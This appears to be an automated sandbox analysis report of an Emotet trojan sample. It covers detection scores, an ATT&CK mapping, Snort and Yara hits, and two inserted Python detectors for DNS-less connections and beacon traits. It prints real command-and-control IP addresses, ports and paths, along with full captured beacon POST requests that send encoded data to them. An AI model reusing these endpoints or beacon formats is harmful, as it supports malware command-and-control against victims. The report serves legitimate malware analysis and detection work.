
Analysis Report pM54o4Q47b

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:211726
Start date:28.02.2020
Start time:09:35:03
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 14m 0s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pM54o4Q47b (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@7/1@1/13
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 96.4% (good quality ratio 93%)
  • Quality average: 83.5%
  • Quality standard deviation: 25.8%
HCA Information:
  • Successful, ratio: 78%
  • Number of executed functions: 69
  • Number of non-executed functions: 336
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, SIHClient.exe, MusNotifyIcon.exe, conhost.exe, backgroundTaskHost.exe, CompatTelRunner.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 13.68.93.109, 52.156.204.185, 13.107.4.50, 205.185.216.10, 205.185.216.42, 104.125.13.142, 2.21.50.224, 67.26.137.254, 67.26.83.254, 8.253.204.120, 8.241.9.126, 8.241.123.254, 2.23.154.32, 2.23.154.17, 8.253.95.120, 8.253.207.121, 8.248.123.254, 8.241.78.126, 8.241.79.254, 8.248.131.254, 8.241.91.126, 8.253.204.121, 8.241.89.126, 8.241.90.254, 67.26.139.254, 8.248.113.254, 8.241.9.254, 8.241.122.126, 8.253.95.121, 8.253.204.249
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, sls.update.microsoft.com.akadns.net, tile-service.weather.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, e15275.g.akamaiedge.net, afdap.au.au-msedge.net, cdn.onenote.net.edgekey.net, settingsfd-geo.trafficmanager.net, sls.emea.update.microsoft.com.akadns.net, au.au-msedge.net, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, sls.update.microsoft.com, e1553.dspg.akamaiedge.net, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, auto.au.download.windowsupdate.com.c.footprint.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy    Score   Range      Reporting   Whitelisted   Threat   Detection
Threshold   100     0 - 100                false         Emotet   malicious

Confidence

Strategy    Score   Range   Further Analysis Required?   Confidence
Threshold   5       0 - 5   false


Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Digits after a technique name are the signature-count badges for that technique; cells without digits were not observed.

Valid Accounts1 | Execution through API111 | Hidden Files and Directories1 | Valid Accounts1 | Software Packing1 | Input Capture1 | System Time Discovery1 | Remote File Copy3 | Input Capture1 | Data Encrypted11 | Uncommonly Used Port1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
Replication Through Removable Media | Command-Line Interface2 | Valid Accounts1 | Access Token Manipulation1 | Deobfuscate/Decode Files or Information1 | Network Sniffing | Security Software Discovery121 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Service Execution12 | Modify Existing Service11 | Process Injection1 | File Deletion1 | Input Capture | System Service Discovery1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Cryptographic Protocol22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scheduled Task | New Service2 | New Service2 | Obfuscated Files or Information2 | Credentials in Files | File and Directory Discovery2 | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol3 | SIM Card Swap | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading121 | Account Manipulation | System Information Discovery34 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol14 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Hidden Files and Directories1 | Brute Force | Virtualization/Sandbox Evasion12 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Valid Accounts1 | Two-Factor Authentication Interception | Process Discovery2 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Virtualization/Sandbox Evasion12 | Bash History | Application Window Discovery1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Access Token Manipulation1 | Input Prompt | Remote System Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Process Injection1 | Keychain | Process Discovery | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | Data Encrypted for Impact
Hardware Additions | Execution through API | File System Permissions Weakness | Valid Accounts | DLL Side-Loading1 | Private Keys | Security Software Discovery | Replication Through Removable Media | Video Capture | Standard Application Layer Protocol | Communication Through Removable Media | Disk Structure Wipe

Signature Overview



AV Detection:

Antivirus detection for sample
Source: pM54o4Q47b.exe | Avira: detection malicious, Label: TR/AD.Emotet.dcjla
Found malware configuration
Source: rdsmethods.exe.2836.3.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["50.116.86.205/srvc"]}
Multi AV Scanner detection for submitted file
Source: pM54o4Q47b.exe | Virustotal: Detection: 76%
Source: pM54o4Q47b.exe | ReversingLabs: Detection: 80%
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.pM54o4Q47b.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.dcjla
Source: 1.0.pM54o4Q47b.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.dcjla
Source: 3.0.rdsmethods.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.dcjla
Source: 2.0.rdsmethods.exe.400000.0.unpack | Avira: Label: TR/AD.Emotet.dcjla

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61F11 CryptExportKey
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61F56 CryptGetHashParam
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 | 192.168.2.7:49833 -> 206.81.10.215:8080
Source: Traffic | Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 192.168.2.7:49835 -> 200.71.148.138:8080
Source: Traffic | Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 | 192.168.2.7:49837 -> 189.209.217.49:80
Source: Traffic | Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 192.168.2.7:49838 -> 115.78.95.230:443
Source: Traffic | Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 | 192.168.2.7:49840 -> 190.147.215.53:22
Source: Traffic | Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 | 192.168.2.7:49841 -> 31.12.67.62:7080
Source: Traffic | Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 | 192.168.2.7:49843 -> 50.116.86.205:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.7:49832 -> 51.68.220.244:8080
Source: global traffic | TCP traffic: 192.168.2.7:49833 -> 206.81.10.215:8080
Source: global traffic | TCP traffic: 192.168.2.7:49834 -> 206.189.112.148:8080
Source: global traffic | TCP traffic: 192.168.2.7:49835 -> 200.71.148.138:8080
Source: global traffic | TCP traffic: 192.168.2.7:49841 -> 31.12.67.62:7080
Source: global traffic | TCP traffic: 192.168.2.7:49843 -> 50.116.86.205:8080
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
    POST /rtm/teapot/ HTTP/1.1
    Referer: http://51.68.220.244/rtm/teapot/
    Content-Type: application/x-www-form-urlencoded
    DNT: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 51.68.220.244:8080
    Content-Length: 676
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /scripts/rtm/xian/ HTTP/1.1
    Referer: http://206.81.10.215/scripts/rtm/xian/
    Content-Type: application/x-www-form-urlencoded
    DNT: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 206.81.10.215:8080
    Content-Length: 625
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /pnp/ HTTP/1.1
    Referer: http://206.189.112.148/pnp/
    Content-Type: application/x-www-form-urlencoded
    DNT: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 206.189.112.148:8080
    Content-Length: 613
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii: WFcH=HAWZoZAi2d4TjXQvX7D5T1qQ7qmIT9Pz17UnozU7zLQnTM1RZfaUkHioHHmH4SheqboP2ZM2U8P0XnK9nymymMt3nzExUHs45twDNXatgDFK27kBhYdb8oY6VKwKGvH1mbHsmxXhT8xJgZ%2BWtyMrECaP3OvVaNAWlrTtRk%2FgeTlc86wdRys7XimPPBICjT9ifWG1fFe3kxed3cngDkd4zBTBjr%2B1Y6jU7JLtxAEcJmSB3Q%2BI1JP9T2qUueSa62k7LhYuxHeSLFrH1%2BuIdCVloXHhc2xSsrB8qIwZX%2F8GM3Y05iiFl8RiRDzGCE52we3dHPb91ikVnnD4OFOOg38WxGLCUCyQ%2Fq9QFob0%2BG30OpuuDdKDyCSXJ0NN5gQGkMUCQFHNIjbVRLjsOV7FICpv7ZHnjMio2XtagAWJ0gqlFNX3StklnZ07ffcaJZ4EVDN7mA8QMurSwTAu7waBpmFYzpZheIAoyQ5Pcxp3fi0C8YJt%2BE0RBaotGCcRIccMSC9zRYsMZ4DJ1vZLyc%2FOefQJCneha5o8CB9W7HuxWmQHuEPPrcd4v59lXYy70jldE3VesqlrfQ%3D%3D
Source: global traffic | HTTP traffic detected:
    POST /srvc/enabled/xian/ HTTP/1.1
    Referer: http://50.116.86.205/srvc/enabled/xian/
    Content-Type: application/x-www-form-urlencoded
    DNT: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 50.116.86.205:8080
    Content-Length: 579
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii: hPoKow2hDU=L8XJEHrJTopzmvkPsjmnMl%2BB3wNIEugSpAuGxLRrcIW8ZpJYP1iTi2tatGcCC9FXLvvtSt4E19k8S%2FbJE%2BCPnPvjZCeDsW5H2GGEniW5nLdf5bttVHDZZ9%2BVMXpLcSHrpta1P12xNuQ3iDYPMTOSuEBOd7NgUU2jfrbEzLZEfv%2F123akIeHdzcndvpTOOXpykLVlJLH8T88inI6ty3%2FbG7%2FYxjfcosIZJWaj5OBkueR%2BMurhca4XIpcmuXwpNYDnCP86J%2FdEc3TKWtlhVtRyBwP7dERF94wDn91YpUMD9sSQIgt1dvHnGoEngdQ1YQ04wtlxij%2BbabhWfV1GelXGfTKvOuQYC%2BzTsStZ3bH0N2LDSM8T4aQJcLaYYIs2gluCT7LXXYrOLoO2iGHJGwg8e6KESK5v45SFhAJgfVG0phIArsyKVlBfsoDWFHbhx9wp1xHTGIcupfcHNoBNdRzqy2g234%2FV9BsCvaXc0aSc62oud3yitRf8BJ1IZaFxCDOFMlqCj3zEg%2Fb3r9KFmFmIZVAJQ1M%3D
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 185.234.72.64 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 51.68.220.244 (7 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 206.189.112.148 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 200.71.148.138 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 192.81.213.192 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 189.209.217.49 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 115.78.95.230 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 94.192.228.255 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 190.147.215.53 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 31.12.67.62 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 31.31.77.83 (3 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 50.116.86.205 (6 connections)
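The signature above fires because the sample walks a hard-coded C2 list: every address is contacted directly, with no DNS answer in the run that could have produced it. The same check is cheap to run over your own DNS and flow logs. The block below is an added example (my code, not Joe Sandbox's) that applies it to constructed Zeek-style dns and conn lines: the C2 addresses are the ones listed in this report, while the benign host/IP pairs, the timestamps, the 13.107.4.50 allowlist entry and the one-hour staleness window are assumptions of the example. It deliberately treats only RFC1918, loopback and link-local ranges as non-public so the documentation addresses in the sample count as "public".

```python
"""Flag TCP connections to public addresses that no earlier DNS answer explains.
Added example (not Joe Sandbox code). Logs are constructed: C2 IPs come from the
report above; benign host/IP pairs, timestamps and the allowlist are made up."""
import ipaddress
from collections import Counter

DNS_LOG = """\
1582879001.2\tupdates.example.net\t203.0.113.10,203.0.113.11
1582879002.9\tcdn.onenote.net\t203.0.113.50
"""
CONN_LOG = """\
1582879003.0\t192.168.2.7\t203.0.113.10\t443\ttcp
1582879004.5\t192.168.2.7\t192.168.2.1\t53\tudp
1582879010.1\t192.168.2.7\t51.68.220.244\t8080\ttcp
1582879010.2\t192.168.2.7\t51.68.220.244\t8080\ttcp
1582879012.7\t192.168.2.7\t206.81.10.215\t8080\ttcp
1582879015.3\t192.168.2.7\t50.116.86.205\t8080\ttcp
1582879015.4\t192.168.2.7\t50.116.86.205\t8080\ttcp
1582879015.5\t192.168.2.7\t50.116.86.205\t8080\ttcp
1582879020.0\t192.168.2.7\t13.107.4.50\t443\ttcp
"""
ALLOWLIST = frozenset({"13.107.4.50"})   # assumed: update/telemetry IP the sandbox also excluded

# Only RFC1918, loopback and link-local are non-public here, so the TEST-NET
# documentation addresses used in the constructed logs are scored as public.
NON_PUBLIC = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_public(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in NON_PUBLIC)


def first_answer_times(dns_text: str) -> dict:
    """Map every IP that appeared in an answer to the earliest time it was returned."""
    first = {}
    for line in dns_text.splitlines():
        ts, _qname, answers = line.split("\t")
        for ip in answers.split(","):
            first.setdefault(ip, float(ts))
    return first


def dnsless_connections(dns_text: str, conn_text: str, allowlist=frozenset(), max_age=3600.0):
    """Return [((dst_ip, dst_port), count), ...] for TCP flows with no explaining DNS answer,
    most frequent destination first."""
    answered = first_answer_times(dns_text)
    hits = Counter()
    for line in conn_text.splitlines():
        ts, _src, dst, dport, proto = line.split("\t")
        if proto != "tcp" or dst in allowlist or not is_public(dst):
            continue
        seen = answered.get(dst)
        # Flag if never resolved, resolved only after the connection, or the answer is stale.
        if seen is None or seen > float(ts) or float(ts) - seen > max_age:
            hits[(dst, int(dport))] += 1
    return sorted(hits.items(), key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    for (ip, port), n in dnsless_connections(DNS_LOG, CONN_LOG, ALLOWLIST):
        print(f"{ip}:{port}  {n} connection(s) without a DNS answer")
```

On real traffic the allowlist has to carry the vendor update and telemetry ranges (the sandbox excluded thirty of them for this run, see the Warnings above), and the staleness window should follow the answer TTL rather than a fixed hour; otherwise CDN-heavy hosts produce noise that drowns the three-per-address pattern visible in this report.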
Contains functionality to download additional files from the internet
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61383 InternetReadFile
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: cdn.onenote.net
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /rtm/teapot/ HTTP/1.1
    Referer: http://51.68.220.244/rtm/teapot/
    Content-Type: application/x-www-form-urlencoded
    DNT: 1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 51.68.220.244:8080
    Content-Length: 676
    Connection: Keep-Alive
    Cache-Control: no-cache
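The POST above and the four recorded under "Uses a known web browser user agent" share one shape: a form-urlencoded POST to a bare IP on a non-standard port, a Referer that repeats the request URL without the port, an Internet Explorer 7 user agent, a short path of lower-case words ending in a slash, and a body consisting of a single random-looking key whose value is one URL-encoded base64 blob. Each trait is harmless on its own; together they make a usable proxy-log detection. The block below is an added example (my code, not Joe Sandbox's or Emotet's) that parses a raw request and counts those traits. SAMPLE_BEACON is the 50.116.86.205:8080 request from this report reassembled with CRLF line ends; BENIGN_POST, the trait names, the verdict threshold of five traits and the 128-byte minimum blob size are assumptions of the example.

```python
"""Score an HTTP request for the Emotet C2 beacon traits recorded in this report.
Added example, not Joe Sandbox or Emotet code. SAMPLE_BEACON is the request to
50.116.86.205:8080 shown above, reassembled with CRLF; BENIGN_POST is a made-up control."""
import base64
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

LEGACY_MSIE_UA = re.compile(r"Mozilla/4\.0 \(compatible; MSIE \d\.0;.*Trident/")
SHORT_WORD_PATH = re.compile(r"^(/[a-z0-9]{2,12}){1,4}/$")   # e.g. /srvc/enabled/xian/
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
VERDICT_THRESHOLD = 5   # assumption for this example: 5 of the 7 traits below


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def _host_port(host_header: str) -> tuple:
    host, _, port = host_header.partition(":")
    return host, int(port) if port else 80


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def _single_base64_blob(body: str):
    """Return the decoded bytes if the body is exactly one key=value pair with a base64 value."""
    pairs = parse_qsl(body, keep_blank_values=True)   # also undoes the %2B/%2F/%3D escaping
    if len(pairs) != 1:
        return None
    key, value = pairs[0]
    if not re.fullmatch(r"[A-Za-z0-9]{3,16}", key) or not B64_VALUE.match(value):
        return None
    try:
        return base64.b64decode(value)
    except ValueError:   # binascii.Error is a ValueError subclass
        return None


def score_request(raw: str) -> dict:
    """Count the beacon traits a request shows; each alone is common, all seven together are not."""
    req = parse_request(raw)
    hdr = req["headers"]
    host, port = _host_port(hdr.get("host", ""))
    referer = urlsplit(hdr.get("referer", ""))
    blob = _single_base64_blob(req["body"]) if req["method"] == "POST" else None
    traits = {
        "form_post": (req["method"] == "POST"
                      and hdr.get("content-type", "").startswith("application/x-www-form-urlencoded")),
        "ip_literal_host": _is_ip_literal(host),            # reached without any DNS lookup
        "non_standard_port": port not in (80, 443),
        "self_referer": referer.hostname == host and referer.path == req["path"],
        "legacy_msie_ua": bool(LEGACY_MSIE_UA.search(hdr.get("user-agent", ""))),
        "short_word_path": bool(SHORT_WORD_PATH.match(req["path"])),
        "single_b64_blob": blob is not None and len(blob) >= 128,   # 128 is an assumed floor
    }
    score = sum(traits.values())
    return {"score": score, "traits": traits, "blob_len": len(blob) if blob else 0,
            "verdict": "emotet_c2_like" if score >= VERDICT_THRESHOLD else "unremarkable"}


SAMPLE_BEACON = (
    "POST /srvc/enabled/xian/ HTTP/1.1\r\n"
    "Referer: http://50.116.86.205/srvc/enabled/xian/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nDNT: 1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0;"
    " .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: 50.116.86.205:8080\r\nContent-Length: 579\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
    "hPoKow2hDU=L8XJEHrJTopzmvkPsjmnMl%2BB3wNIEugSpAuGxLRrcIW8ZpJYP1iTi2tatGcCC9FXLvvtSt4E19k8S%2FbJE"
    "%2BCPnPvjZCeDsW5H2GGEniW5nLdf5bttVHDZZ9%2BVMXpLcSHrpta1P12xNuQ3iDYPMTOSuEBOd7NgUU2jfrbEzLZEfv%2F123"
    "akIeHdzcndvpTOOXpykLVlJLH8T88inI6ty3%2FbG7%2FYxjfcosIZJWaj5OBkueR%2BMurhca4XIpcmuXwpNYDnCP86J%2FdEc3"
    "TKWtlhVtRyBwP7dERF94wDn91YpUMD9sSQIgt1dvHnGoEngdQ1YQ04wtlxij%2BbabhWfV1GelXGfTKvOuQYC%2BzTsStZ3bH0N2"
    "LDSM8T4aQJcLaYYIs2gluCT7LXXYrOLoO2iGHJGwg8e6KESK5v45SFhAJgfVG0phIArsyKVlBfsoDWFHbhx9wp1xHTGIcupfcHNo"
    "BNdRzqy2g234%2FV9BsCvaXc0aSc62oud3yitRf8BJ1IZaFxCDOFMlqCj3zEg%2Fb3r9KFmFmIZVAJQ1M%3D"
)
BENIGN_POST = (   # constructed control: a JSON login from a current browser to a named host
    "POST /api/v1/login HTTP/1.1\r\nHost: portal.example.com\r\n"
    "Referer: https://portal.example.com/login\r\nContent-Type: application/json\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/70.0 Safari/537.36\r\n"
    '\r\n{"user":"alice","password":"hunter2"}'
)
```

Run `score_request(SAMPLE_BEACON)` to see all seven traits set and the decoded blob length; `score_request(BENIGN_POST)` scores zero. The key name and the path words differ per bot, which is why the check looks at their shape rather than their values; the ASCII form of the body is lossless here because base64 and URL escaping leave only printable characters.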
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 28 Feb 2020 08:37:40 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html> followed by six repetitions of <!-- a padding to disable MSIE and Chrome friendly error page -->
Urls found in memory or binary data
Source: rdsmethods.exe, 00000003.00000002.2915021161.0000000000199000.00000004.00000001.sdmp | String found in binary or memory: http://50.116.86.205/srvc/enabled/xian/
Source: svchost.exe, 00000008.00000002.1534469854.0000017881DB0000.00000002.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_004262B3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 0_2_00422DAF GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_004262B3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Users\user\Desktop\pM54o4Q47b.exe | Code function: 1_2_00422DAF GetKeyState,GetKeyState,GetKeyState,GetKeyState

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E6CE15
Yara detected Emotet
Source: Yara match | File source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\SysWOW64\rdsmethods.exe | Code function: 3_2_00E61F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.1208704622.0000000002201000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
